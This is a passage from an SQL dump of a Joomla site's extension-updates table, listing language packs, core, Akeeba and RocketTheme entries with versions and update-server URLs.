Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4396,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4397,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4398,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4399,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4400,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4401,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4402,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4403,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4404,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4405,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4406,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4407,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4408,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4409,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4410,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4411,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4412,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4413,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4414,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4415,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4416,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4417,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4418,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4419,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4420,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4421,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4422,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4423,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4424,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4425,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4426,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4427,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4428,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4429,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4430,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4431,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(4432,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(4433,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(4434,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(4435,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(4436,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(4437,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4438,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4439,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4440,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4441,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4442,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4443,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4444,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4445,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4446,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4447,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4448,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4449,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4450,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4451,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4452,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4453,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4454,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4455,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4456,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4457,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4458,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4459,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4460,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4461,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4462,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4463,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4464,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4465,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4466,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4467,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4468,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4469,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4470,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4471,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4472,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4473,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4474,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4475,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4476,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4477,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4478,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4479,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4480,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4481,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4482,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4483,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(4484,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(4485,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(4487,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4488,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4489,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4490,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4491,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4492,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4493,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4494,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4495,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4496,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4497,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4498,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4499,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4500,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4501,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4502,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4503,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4504,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4505,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4506,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4507,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4508,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4509,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4510,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4511,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4512,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4513,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4514,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4515,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4516,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4517,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4518,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4519,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4520,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4521,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4522,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4523,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4524,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4525,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4526,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4527,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4528,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4529,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4530,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4531,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4532,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4533,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4534,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4535,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4536,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4537,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4538,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4539,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4540,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4541,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4542,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4543,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4544,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4545,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4546,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4547,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4548,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4549,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4550,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4551,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4552,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4553,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4554,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4555,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4556,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4557,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4558,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4559,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4560,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4561,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4562,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4563,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4564,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4565,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(4566,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(4567,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(4568,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(4569,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(4570,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(4571,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4572,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4573,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4574,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4575,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4576,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4577,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4578,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4579,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4580,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4581,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4582,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4583,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4584,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4585,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4586,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4587,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4588,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4589,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4590,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4591,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4592,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4593,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4594,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4595,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4596,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4597,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4598,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4599,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4600,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4601,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4602,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4603,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4604,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4605,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4606,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4607,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4608,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4609,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4610,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4611,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4612,57,0,'German 